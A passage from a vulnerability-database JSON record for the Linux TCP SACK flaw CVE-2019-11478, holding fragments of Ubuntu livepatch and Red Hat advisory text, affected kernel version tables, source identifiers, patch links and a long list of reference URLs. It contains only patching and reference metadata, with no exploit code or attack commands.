| lowlatency, generic      |\n| 4.4.0-151.178~14.04.1    | 58.1     | generic, lowlatency      |\n| 4.4.0-154.181            | 58.1     | lowlatency, generic      |\n| 4.4.0-154.181~14.04.1    | 58.1     | generic, lowlatency      |\n| 4.4.0-157.185            | 58.1     | lowlatency, generic      |\n| 4.4.0-157.185~14.04.1    | 58.1     | generic, lowlatency      |\n| 4.4.0-159.187            | 58.1     | lowlatency, generic      |\n| 4.4.0-159.187~14.04.1    | 58.1     | generic, lowlatency      |\n| 4.4.0-161.189            | 58.1     | lowlatency, generic      |\n| 4.4.0-161.189~14.04.1    | 58.1     | lowlatency, generic      |\n| 4.4.0-164.192            | 58.1     | lowlatency, generic      |\n| 4.4.0-164.192~14.04.1    | 58.1     | lowlatency, generic      |\n| 4.4.0-165.193            | 58.1     | generic, lowlatency      |\n| 4.4.0-1083.93            | 58.1     | aws                      |\n| 4.4.0-1084.94            | 58.1     | aws                      |\n| 4.4.0-1085.96            | 58.1     | aws                      |\n| 4.4.0-1087.98            | 58.1     | aws                      |\n| 4.4.0-1088.99            | 58.1     | aws                      |\n| 4.4.0-1090.101           | 58.1     | aws                      |\n| 4.4.0-1092.103           | 58.1     | aws                      |\n| 4.4.0-1094.105           | 58.1     | aws                      |\n| 4.15.0-50.54             | 58.1     | generic, lowlatency      |\n| 4.15.0-50.54~16.04.1     | 58.1     | generic, lowlatency      |\n| 4.15.0-51.55             | 58.1     | generic, lowlatency      |\n| 4.15.0-51.55~16.04.1     | 58.1     | generic, lowlatency      |\n| 4.15.0-52.56             | 58.1     | lowlatency, generic      |\n| 4.15.0-52.56~16.04.1     | 58.1     | generic, lowlatency      |\n| 4.15.0-54.58             | 58.1     | generic, lowlatency      |\n| 4.15.0-54.58~16.04.1     | 58.1     | generic, lowlatency      |\n| 4.15.0-55.60             | 58.1     | generic, lowlatency      |\n| 4.15.0-58.64             | 58.1     | generic, lowlatency      |\n| 4.15.0-58.64~16.04.1     | 58.1     | lowlatency, generic      |\n| 4.15.0-60.67             | 58.1     | lowlatency, generic      |\n| 4.15.0-60.67~16.04.1     | 58.1     | generic, lowlatency      |\n| 4.15.0-62.69             | 58.1     | generic, lowlatency      |\n| 4.15.0-62.69~16.04.1     | 58.1     | lowlatency, generic      |\n| 4.15.0-64.73             | 58.1     | generic, lowlatency      |\n| 4.15.0-64.73~16.04.1     | 58.1     | lowlatency, generic      |\n| 4.15.0-65.74             | 58.1     | lowlatency, generic      |\n| 4.15.0-1038.43           | 58.1     | oem                      |\n| 4.15.0-1039.41           | 58.1     | aws                      |\n| 4.15.0-1039.44           | 58.1     | oem                      |\n| 4.15.0-1040.42           | 58.1     | aws                      |\n| 4.15.0-1041.43           | 58.1     | aws                      |\n| 4.15.0-1043.45           | 58.1     | aws                      |\n| 4.15.0-1043.48           | 58.1     | oem                      |\n| 4.15.0-1044.46           | 58.1     | aws                      |\n| 4.15.0-1045.47           | 58.1     | aws                      |\n| 4.15.0-1045.50           | 58.1     | oem                      |\n| 4.15.0-1047.49           | 58.1     | aws                      |\n| 4.15.0-1047.51           | 58.1     | azure                    |\n| 4.15.0-1048.50           | 58.1     | aws                      |\n| 4.15.0-1049.54           | 58.1     | azure                    |\n| 4.15.0-1050.52           | 58.1     | aws                      |\n| 4.15.0-1050.55           | 58.1     | azure                    |\n| 4.15.0-1050.57           | 58.1     | oem                      |\n| 4.15.0-1051.53           | 58.1     | aws                      |\n| 4.15.0-1051.56           | 58.1     | azure                    |\n| 4.15.0-1052.57           | 58.1     | azure                    |\n| 4.15.0-1055.60           | 58.1     | azure                    |\n| 4.15.0-1056.61           | 58.1     | azure                    |\n| 4.15.0-1056.65           | 58.1     | oem                      |\n| 4.15.0-1057.62           | 58.1     | azure                    |\n| 4.15.0-1057.66           | 58.1     | oem                      |\n| 4.15.0-1059.64           | 58.1     | azure                    |\n| 5.0.0-1014.14~18.04.1    | 58.1     | azure                    |\n| 5.0.0-1016.17~18.04.1    | 58.1     | azure                    |\n| 5.0.0-1018.19~18.04.1    | 58.1     | azure                    |\n| 5.0.0-1020.21~18.04.1    | 58.1     | azure                    |\n\nSupport Information:\n\nKernels older than the levels listed below do not receive livepatch\nupdates. Please upgrade your kernel as soon as possible. \n\n| Series           | Version          | Flavors                  |\n|------------------+------------------+--------------------------|\n| Ubuntu 18.04 LTS | 4.15.0-1039      | aws                      |\n| Ubuntu 16.04 LTS | 4.4.0-1083       | aws                      |\n| Ubuntu 18.04 LTS | 5.0.0-1000       | azure                    |\n| Ubuntu 16.04 LTS | 4.15.0-1047      | azure                    |\n| Ubuntu 18.04 LTS | 4.15.0-50        | generic lowlatency       |\n| Ubuntu 16.04 LTS | 4.15.0-50        | generic lowlatency       |\n| Ubuntu 14.04 LTS | 4.4.0-148        | generic lowlatency       |\n| Ubuntu 18.04 LTS | 4.15.0-1038      | oem                      |\n| Ubuntu 16.04 LTS | 4.4.0-148        | generic lowlatency       |\n\nReferences:\n  CVE-2016-10905, CVE-2018-20856, CVE-2018-20961, CVE-2018-20976, \n  CVE-2018-21008, CVE-2019-0136, CVE-2019-2054, CVE-2019-2181, \n  CVE-2019-3846, CVE-2019-10126, CVE-2019-10207, CVE-2019-11477, \n  CVE-2019-11478, CVE-2019-11833, CVE-2019-12614, CVE-2019-14283, \n  CVE-2019-14284, CVE-2019-14814, CVE-2019-14815, CVE-2019-14816, \n  CVE-2019-14821, CVE-2019-14835\n\n\n-- \nubuntu-security-announce mailing list\nubuntu-security-announce@lists.ubuntu.com\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\n. 7) - x86_64\n\n3. Description:\n\nThe kernel-rt packages provide the Real Time Linux Kernel, which enables\nfine-tuning for systems with extremely high determinism requirements. 7.2) - noarch, x86_64\n\n3. \n\nBug Fix(es):\n\n* THP: Race between MADV_DONTNEED and NUMA hinting node migration code\n(BZ#1698103)\n\n* [RHEL7] md_clear flag missing from /proc/cpuinfo on late microcode update\n(BZ#1712989)\n\n* [RHEL7] MDS mitigations are not enabled after double microcode update\n(BZ#1712994)\n\n* WARNING: CPU: 0 PID: 0 at kernel/jump_label.c:90\n__static_key_slow_dec+0xa6/0xb0 (BZ#1713000)\n\n4. \n\nBug Fix(es):\n\n* kernel-rt: update to the RHEL8.0.z batch#1 source tree (BZ#1704955)\n\n4. These packages include redhat-release-virtualization-host,\novirt-node, and rhev-hypervisor. RHVH features a Cockpit user\ninterface for monitoring the host\u0027s resources and performing administrative\ntasks. \n\nThe following packages have been upgraded to a later upstream version:\nredhat-release-virtualization-host (4.3.4), redhat-virtualization-host\n(4.3.4)",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2019-11478"
      },
      {
        "db": "CERT/CC",
        "id": "VU#905115"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-005618"
      },
      {
        "db": "BID",
        "id": "108798"
      },
      {
        "db": "VULHUB",
        "id": "VHN-143128"
      },
      {
        "db": "PACKETSTORM",
        "id": "153316"
      },
      {
        "db": "PACKETSTORM",
        "id": "153319"
      },
      {
        "db": "PACKETSTORM",
        "id": "154951"
      },
      {
        "db": "PACKETSTORM",
        "id": "153317"
      },
      {
        "db": "PACKETSTORM",
        "id": "153322"
      },
      {
        "db": "PACKETSTORM",
        "id": "153324"
      },
      {
        "db": "PACKETSTORM",
        "id": "153321"
      },
      {
        "db": "PACKETSTORM",
        "id": "153325"
      },
      {
        "db": "PACKETSTORM",
        "id": "153543"
      },
      {
        "db": "PACKETSTORM",
        "id": "153424"
      }
    ],
    "trust": 3.6
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2019-11478",
        "trust": 4.6
      },
      {
        "db": "CERT/CC",
        "id": "VU#905115",
        "trust": 3.3
      },
      {
        "db": "ICS CERT",
        "id": "ICSA-19-253-03",
        "trust": 2.5
      },
      {
        "db": "PULSESECURE",
        "id": "SA44193",
        "trust": 2.0
      },
      {
        "db": "MCAFEE",
        "id": "SB10287",
        "trust": 2.0
      },
      {
        "db": "PACKETSTORM",
        "id": "154951",
        "trust": 1.8
      },
      {
        "db": "PACKETSTORM",
        "id": "153346",
        "trust": 1.7
      },
      {
        "db": "PACKETSTORM",
        "id": "154408",
        "trust": 1.7
      },
      {
        "db": "SIEMENS",
        "id": "SSA-462066",
        "trust": 1.7
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2019/06/28/2",
        "trust": 1.7
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2019/10/29/3",
        "trust": 1.7
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2019/10/24/1",
        "trust": 1.7
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2019/07/06/4",
        "trust": 1.7
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2019/07/06/3",
        "trust": 1.7
      },
      {
        "db": "BID",
        "id": "108798",
        "trust": 1.0
      },
      {
        "db": "JVN",
        "id": "JVNVU93800789",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-005618",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201906-682",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "153329",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.3564",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.4528",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.4255",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.2171",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.0736",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.2155",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.0342",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.2231",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ASB-2019.0178.3",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.4316",
        "trust": 0.6
      },
      {
        "db": "LENOVO",
        "id": "LEN-29592",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-143128",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "153316",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "153319",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "153317",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "153322",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "153324",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "153321",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "153325",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "153543",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "153424",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#905115"
      },
      {
        "db": "VULHUB",
        "id": "VHN-143128"
      },
      {
        "db": "BID",
        "id": "108798"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-005618"
      },
      {
        "db": "PACKETSTORM",
        "id": "153316"
      },
      {
        "db": "PACKETSTORM",
        "id": "153319"
      },
      {
        "db": "PACKETSTORM",
        "id": "154951"
      },
      {
        "db": "PACKETSTORM",
        "id": "153317"
      },
      {
        "db": "PACKETSTORM",
        "id": "153322"
      },
      {
        "db": "PACKETSTORM",
        "id": "153324"
      },
      {
        "db": "PACKETSTORM",
        "id": "153321"
      },
      {
        "db": "PACKETSTORM",
        "id": "153325"
      },
      {
        "db": "PACKETSTORM",
        "id": "153543"
      },
      {
        "db": "PACKETSTORM",
        "id": "153424"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201906-682"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-11478"
      }
    ]
  },
  "id": "VAR-201906-1176",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-143128"
      }
    ],
    "trust": 0.5256111242857142
  },
  "last_update_date": "2024-07-23T21:31:12.688000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Linux Kernel Archives",
        "trust": 0.8,
        "url": "https://www.kernel.org/"
      },
      {
        "title": "tcp: tcp_fragment() should apply sane memory limits",
        "trust": 0.8,
        "url": "https://git.kernel.org/pub/scm/linux/kernel/git/davem/net.git/commit/?id=f070ef2ac66716357066b683fb0baf55f8191a2e"
      },
      {
        "title": "TCP SACK PANIC - Kernel vulnerabilities - CVE-2019-11477, CVE-2019-11478 \u0026 CVE-2019-11479",
        "trust": 0.8,
        "url": "https://access.redhat.com/security/vulnerabilities/tcpsack"
      },
      {
        "title": "SA44193",
        "trust": 0.8,
        "url": "https://kb.pulsesecure.net/articles/pulse_security_advisories/sa44193"
      },
      {
        "title": "K26618426",
        "trust": 0.8,
        "url": "https://support.f5.com/csp/article/k26618426"
      },
      {
        "title": "SACK Panic and Other TCP Denial of Service Issues",
        "trust": 0.8,
        "url": "https://wiki.ubuntu.com/securityteam/knowledgebase/sackpanic"
      },
      {
        "title": "Linux kernel Remediation of resource management error vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=93876"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-005618"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201906-682"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-400",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-143128"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-005618"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-11478"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 4.4,
        "url": "https://access.redhat.com/security/vulnerabilities/tcpsack"
      },
      {
        "trust": 3.6,
        "url": "https://github.com/netflix/security-bulletins/blob/master/advisories/third-party/2019-001.md"
      },
      {
        "trust": 3.1,
        "url": "https://www.us-cert.gov/ics/advisories/icsa-19-253-03"
      },
      {
        "trust": 2.5,
        "url": "https://www.synology.com/security/advisory/synology_sa_19_28"
      },
      {
        "trust": 2.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-11478"
      },
      {
        "trust": 2.3,
        "url": "http://packetstormsecurity.com/files/153346/kernel-live-patch-security-notice-lsn-0052-1.html"
      },
      {
        "trust": 2.1,
        "url": "https://access.redhat.com/errata/rhsa-2019:1594"
      },
      {
        "trust": 2.0,
        "url": "http://www.vmware.com/security/advisories/vmsa-2019-0010.html"
      },
      {
        "trust": 2.0,
        "url": "https://kb.pulsesecure.net/articles/pulse_security_advisories/sa44193"
      },
      {
        "trust": 2.0,
        "url": "https://security.netapp.com/advisory/ntap-20190625-0001/"
      },
      {
        "trust": 2.0,
        "url": "https://support.f5.com/csp/article/k26618426"
      },
      {
        "trust": 2.0,
        "url": "https://git.kernel.org/pub/scm/linux/kernel/git/davem/net.git/commit/?id=f070ef2ac66716357066b683fb0baf55f8191a2e"
      },
      {
        "trust": 2.0,
        "url": "https://wiki.ubuntu.com/securityteam/knowledgebase/sackpanic"
      },
      {
        "trust": 2.0,
        "url": "https://access.redhat.com/errata/rhsa-2019:1602"
      },
      {
        "trust": 1.9,
        "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10287"
      },
      {
        "trust": 1.8,
        "url": "https://access.redhat.com/errata/rhsa-2019:1699"
      },
      {
        "trust": 1.8,
        "url": "https://access.redhat.com/security/cve/cve-2019-11478"
      },
      {
        "trust": 1.7,
        "url": "https://seclists.org/bugtraq/2019/jul/30"
      },
      {
        "trust": 1.7,
        "url": "https://www.kb.cert.org/vuls/id/905115"
      },
      {
        "trust": 1.7,
        "url": "http://www.arubanetworks.com/assets/alert/aruba-psa-2020-010.txt"
      },
      {
        "trust": 1.7,
        "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-462066.pdf"
      },
      {
        "trust": 1.7,
        "url": "https://psirt.global.sonicwall.com/vuln-detail/snwlid-2019-0007"
      },
      {
        "trust": 1.7,
        "url": "http://packetstormsecurity.com/files/154408/kernel-live-patch-security-notice-lsn-0055-1.html"
      },
      {
        "trust": 1.7,
        "url": "http://packetstormsecurity.com/files/154951/kernel-live-patch-security-notice-lsn-0058-1.html"
      },
      {
        "trust": 1.7,
        "url": "https://www.oracle.com/security-alerts/cpujan2020.html"
      },
      {
        "trust": 1.7,
        "url": "https://www.oracle.com/security-alerts/cpuoct2020.html"
      },
      {
        "trust": 1.7,
        "url": "http://www.openwall.com/lists/oss-security/2019/06/28/2"
      },
      {
        "trust": 1.7,
        "url": "http://www.openwall.com/lists/oss-security/2019/07/06/3"
      },
      {
        "trust": 1.7,
        "url": "http://www.openwall.com/lists/oss-security/2019/07/06/4"
      },
      {
        "trust": 1.7,
        "url": "http://www.openwall.com/lists/oss-security/2019/10/24/1"
      },
      {
        "trust": 1.7,
        "url": "http://www.openwall.com/lists/oss-security/2019/10/29/3"
      },
      {
        "trust": 1.6,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-11478"
      },
      {
        "trust": 1.0,
        "url": "https://access.redhat.com/errata/rhsa-2019:1480"
      },
      {
        "trust": 1.0,
        "url": "https://access.redhat.com/errata/rhsa-2019:1481"
      },
      {
        "trust": 1.0,
        "url": "https://access.redhat.com/errata/rhsa-2019:1483"
      },
      {
        "trust": 1.0,
        "url": "https://access.redhat.com/errata/rhsa-2019:1485"
      },
      {
        "trust": 1.0,
        "url": "https://access.redhat.com/errata/rhsa-2019:1486"
      },
      {
        "trust": 1.0,
        "url": "https://access.redhat.com/errata/rhsa-2019:1488"
      },
      {
        "trust": 1.0,
        "url": "https://access.redhat.com/errata/rhsa-2019:1490"
      },
      {
        "trust": 1.0,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-11477"
      },
      {
        "trust": 0.9,
        "url": "http://www.kernel.org/"
      },
      {
        "trust": 0.9,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1719128"
      },
      {
        "trust": 0.9,
        "url": "https://support.citrix.com/article/ctx256725"
      },
      {
        "trust": 0.9,
        "url": "https://access.redhat.com/errata/rhsa-2019:1479"
      },
      {
        "trust": 0.9,
        "url": "https://access.redhat.com/errata/rhsa-2019:1482"
      },
      {
        "trust": 0.9,
        "url": "https://access.redhat.com/errata/rhsa-2019:1484"
      },
      {
        "trust": 0.9,
        "url": "https://access.redhat.com/errata/rhsa-2019:1487"
      },
      {
        "trust": 0.9,
        "url": "https://access.redhat.com/errata/rhsa-2019:1489"
      },
      {
        "trust": 0.9,
        "url": "https://usn.ubuntu.com/4017-1"
      },
      {
        "trust": 0.9,
        "url": "https://usn.ubuntu.com/4017-2"
      },
      {
        "trust": 0.9,
        "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.9,
        "url": "https://access.redhat.com/security/cve/cve-2019-11477"
      },
      {
        "trust": 0.9,
        "url": "https://access.redhat.com/security/cve/cve-2019-11479"
      },
      {
        "trust": 0.9,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.9,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.9,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-11479"
      },
      {
        "trust": 0.9,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.9,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-11477"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-11479"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-5599"
      },
      {
        "trust": 0.8,
        "url": "https://security.archlinux.org/cve-2019-11477https://security.archlinux.org/cve-2019-11478https://security.archlinux.org/cve-2019-11479"
      },
      {
        "trust": 0.8,
        "url": "https://www.arista.com/en/support/advisories-notices/security-advisories/8066-security-advisory-41"
      },
      {
        "trust": 0.8,
        "url": "https://coreos.com/releases/"
      },
      {
        "trust": 0.8,
        "url": "https://security-tracker.debian.org/tracker/cve-2019-11477https://security-tracker.debian.org/tracker/cve-2019-11478https://security-tracker.debian.org/tracker/cve-2019-11479"
      },
      {
        "trust": 0.8,
        "url": "https://www.suse.com/c/suse-addresses-the-sack-panic-tcp-remote-denial-of-service-attacks/https://www.suse.com/support/kb/doc/?id=7023928"
      },
      {
        "trust": 0.8,
        "url": "https://usn.ubuntu.com/4017-1/https://usn.ubuntu.com/4017-2/"
      },
      {
        "trust": 0.8,
        "url": "https://jvn.jp/vu/jvnvu93800789/"
      },
      {
        "trust": 0.8,
        "url": "https://www.kb.cert.org/vuls/id/905115/"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20191530-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20191529-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20191532-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20191536-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/support/pages/node/1284766"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/support/pages/node/1284760"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/support/pages/node/1284772"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/support/pages/node/1284778"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/support/pages/node/1284784"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20191550-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20191535-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20191534-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20191533-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20191527-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-201914089-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20191581-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20191588-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://fortiguard.com/psirt/fg-ir-19-180"
      },
      {
        "trust": 0.6,
        "url": "https://vigilance.fr/vulnerability/linux-kernel-denial-of-service-via-tcp-sack-fragmented-retransmission-queue-29544"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.4528/"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-have-been-identified-in-openssl-and-the-kernel-shipped-with-the-ds8000-hardware-management-console-hmc/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.4316/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.0736/"
      },
      {
        "trust": 0.6,
        "url": "https://support.lenovo.com/us/en/product_security/len-29592"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/153329/linux-freebsd-tcp-based-denial-of-service.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/support/pages/node/1137796"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.4255/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.2231/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.2155/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.2171/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/asb-2019.0178.3/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.0342/"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-has-announced-a-release-for-ibm-security-identity-governance-and-intelligence-in-response-to-security-vulnerability-cve-2019-11479-cve-2019-11478-cve-2019-11477/"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/support/pages/node/3517185"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/support/pages/node/1164286"
      },
      {
        "trust": 0.6,
        "url": "https://us-cert.cisa.gov/ics/advisories/icsa-19-253-03"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-integrated-management-module-ii-imm2-is-affected-by-vulnerabilities-in-tcp-cve-2019-11477-cve-2019-11478-cve-2019-11479/"
      },
      {
        "trust": 0.6,
        "url": "https://www.securityfocus.com/bid/108798"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.3564/"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-bootable-media-creator-bomc-is-affected-by-vulnerabilities-in-the-kernel/"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-3896"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-3896"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/articles/2974891"
      },
      {
        "trust": 0.1,
        "url": "https://kc.mcafee.com/corporate/index?page=content\u0026amp;id=sb10287"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-7566"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-1000004"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-7566"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-1000004"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14815"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-20856"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-2181"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-10207"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14821"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14835"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-3846"
      },
      {
        "trust": 0.1,
        "url": "https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-10905"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14816"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-12614"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-21008"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-10126"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14284"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14283"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-11833"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-2054"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-20976"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-0136"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14814"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-20961"
      },
      {
        "trust": 0.1,
